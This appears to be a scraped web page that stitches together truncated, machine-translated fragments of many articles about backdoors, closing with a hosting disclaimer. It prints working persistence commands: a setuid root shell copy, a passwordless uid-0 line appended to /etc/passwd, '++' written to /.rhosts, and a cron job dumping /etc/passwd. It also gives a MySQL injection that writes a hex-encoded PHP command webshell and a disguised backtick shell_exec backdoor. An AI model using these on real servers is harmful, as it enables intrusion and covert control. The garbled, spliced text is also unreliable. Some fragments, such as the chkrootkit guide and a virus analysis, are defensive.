Hello everyone, I wonder if you have used WebAdmin 2.x? Well, that's the backdoor in the ASP. Net environment. That's my immature work. If there's anything that doesn't work well, I 'd like to bear it with me. Oh, today, let's try again and tell you something about WebAdmin.Hello everyone, I wonder if you have used WebAdmin 2.x? Well, that's the backdoor in the ASP. Net environment. That's my immature work.
1. setuid# Cp/bin/sh/tmp/. sh# Chmod u + s/tmp/. shAdding suid to shell is simple but easy to find
2. echo "hack: 0: 0: // bin/csh">/etc/passwdThat is, add an account with the id 0 (root) to the system without a password.But the Administrator will soon find out!
3. echo "++">/. rhostsIf the system runs port 512,513, you canAdd a file named hack to The. rhosts file. log on to rlogin without a password!
4. Add a "wiz" command to modify the sendmail. cf file;Then telnet www.xxx.com 25 and then wiz
Beep. sys/Trojan. ntrootkit.1192, msplugplay 1005.sys/ backdoor. pigeon.13201, etc. 2
Original endurer2008-06-25 1st
(Continued 1)Modify the computer date, and then download drweb cureit! Scan.At the same time, download bat_do and fileinfo to extract file information, package and backup, and delete files in a delayed manner.Then download the rising Kaka Security Assistant to clean up the malicious program startup project.
Appendix 1: malicious file in
PHP-based applications face a variety of attacks:
XSS: Cross-site scripting is a vulnerable point for PHP Web applications. Attackers can use it to steal user information. You can configure Apache, or write more secure PHP code (verify all user input) to protect against XSS attacks
SQL injection: This is the vulnerable point of the database layer in PHP applications. The precautionary approach is ibid. A common approach is to use mysql_real_escape_string () to escape a parameter and then mak
How to generate a backdoor Trojan using Mysql statements: SELECT * FROM 'vbb _ strikes 'WHERE1unionselect2, 3, metadata: inetpubwwwrootcmd. php Mysql injection or MySQL statement in phpmyadmin
How to generate a backdoor Trojan using Mysql statements:
SELECT * FROM `vbb_strikes` WHERE 1 union select2,3,0x3C3F7068702073797374656D28245F524551554553545B636D645D293B3F3E from vbb_strikes i
After a successful test, you usually want to keep the privilege longer. The job of leaving the back door is very important, usually the backdoor is laid out including but not limited to database permissions, Web permissions, System user permissions, and so on. This article on the public back door hidden some ideas to do science.AD:0x00 PrefaceAfter a successful test, you usually want to keep the privilege longer. The job of leaving the back door is ve
handles invoke the SetServiceStatus function with the Service_accept_shutdow control code to receive the Nservice_control_shutdown control code.
3. Service Configuration Program
The service configuration program can change or query the current configuration information for the service. Before invoking the service configuration function, you must obtain a handle to the service object, which we can, of course, by invoking the Openscmanager,openservice or CreateService function.
Create, Delete Ser
For more information about how to create a Linux BackDoor-general Linux technology-Linux programming and kernel, see the following. Each file has an owner, indicating who created the file. At the same time, the file also has a group number, indicating the group to which the file belongs, generally the group to which the file owner belongs.
If it is an executable file, the file generally only has the permission of the user who calls the file during exe
Use the linux backdoor loader program written in perl-general Linux technology-Linux programming and kernel information. The following is a detailed description. Print "++ linux Backdoor tool ++ \ n ";
Print "usage instructions, there are three modes: rushroot, fakebackdoor, and rushport. rushroot adds an account to passwd, and the user name is root, the password is null. n fakebackdoor is bound to a shell
: This article mainly introduces the simple and concealed backdoor Trojan code. if you are interested in the PHP Tutorial, refer to it. This article will introduce a very short and concealed backdoor Trojan, so that you can avoid Trojans when detecting programs.
The file content is as follows:
Many annotators are inserted in the code, which is difficult to detect if the server detection program is not
will get the root user permission easily. This method is almost the most popular. However, many systems clear data in the/tmp directory every few hours or every startup. Other systems do not allow suid programs in the/tmp directory. Of course, you can modify or clear these limits by yourself (because you are already the root user and have the permission to modify/var/spool/cron/CrontabS/root and/etc/fstab files ). The following is the C source program for placing the suid shell program in the/t
PHP security-webshell and webshell detection, phpwebshell Backdoor
PHP-based applications face various attacks:
XSS: For PHP Web applications, cross-site scripting is a vulnerable point. Attackers can exploit this vulnerability to steal user information. You can configure Apache or write safer PHP code (verify all user input) to prevent XSS attacks.
SQL Injection: This is a vulnerable attack point at the database layer in PHP applications. The defe
Once suffered from Trojans, backdoor (hereinafter referred to as the backdoor), people will not forget the destruction of the machine after the carnage, so people launched a positive defensive work, from the patch to the firewall, want to even add a validator, in a variety of defensive techniques under the fire, a large number of back door down, rookie do not have to panic online ... ... But will the back d
* * * rm-f/DEV/TTYSDW'>>/etc/door.cron;service Crond Restart;crontab/etc/door.cron;The second line is to append the "cat/etc/passwd * * * * * * * * * * * >/dev/ttypwd" information to the/etc/door.cron file./etc/door.cron is a user-defined crontab list file that is executed according to the content of the file.Write Format: * * * * * commandThe preceding 5 stars represent minutes (0~59), Hours (0~23), date (1~31), month (1~12), Day of the Week (0~6), and the following commands to be executed.So
of the T.txt OK, then add the Lanker mini PHP backdoor client Trojan address to the http://localhost/test/test.php?test=. /t.txt Password added to cmd on it, the results of the implementation of the return can be seen.
For HTML files, this is typically a template file. In order for the Trojan to be inserted into the HTML file to be invoked and not displayed, we can add a text box with a hidden attribute in HTML, such as: Then use the method above. Th
Occasionally see a paragraph, it seems that there is no problem, it is a fatal backdoor code, here used a general phper not pay attention to the reverse apostrophe ', the reverse apostrophe contains strings, equivalent to the Shell_exec function.
Camouflage is very good, easy to be ignored by the administrator.
$selfNums = $_get[' R '];
if (Isset ($selfNums)) {
echo ' $selfNums ';
}
Just see this code I think everyone will say no problem,
trojan in the picture or HTML file, you can say that the concealment is even higher. Insert the following sentence in the Phpwind forum: "? @include includ/$PHPWIND _root; > General admin is unable to see out.
With the include function to help us, we can hide the PHP trojan in many types of files, such as TXT, HTML, and picture files. Because TXT, HTML and picture files of these three types of files in the forum or article system is the most common, the following we will do the test in turn.
Fi
Rootkit from a superficial point of view is a self concealment of backdoor procedures, it is often an intruder as an intrusion tool. By Rootkit, intruders can secretly control the compromised computer, which is a huge hazard. Chkrootkit is a tool for searching the back door of a Linux system to detect rootkit. This article will introduce the installation and use method of Chkrootkit.
Chkrootkit is not included in the official CentOS or Debian source,
Virus name: Backdoor. Win32.IRCBot. acd (Kaspersky)
Virus size: 118,272 bytes
Shelling method: PE_Patch NTKrnl
Sample MD5: 71b015411d27794c3e900707ef21e6e7
Sample SHA1: 934b80b2bfbb744933ad9de35bc2b588c852d08e
Time detected: 2007.7
Time updated: 2007.7
Transmission Mode: Spread through MSN
Technical Analysis
The virus sends a message to the MSN contact and is a photo-infected compressed package. When the contact of the other party receives and opens
Manually create a Server Self-extract shift Backdoor
Most of the time we get a server, we will leave a backdoor program to facilitate the next entry.
The mainstream server is the shift backdoor, which also replaces the built-in sticky key of the server with our backdoor file.
Call method: Call the function by pressing
The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion;
products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the
content of the page makes you feel confusing, please write us an email, we will handle the problem
within 5 days after receiving your email.
If you find any instances of plagiarism from the community, please send an email to:
info-contact@alibabacloud.com
and provide relevant evidence. A staff member will contact you within 5 working days.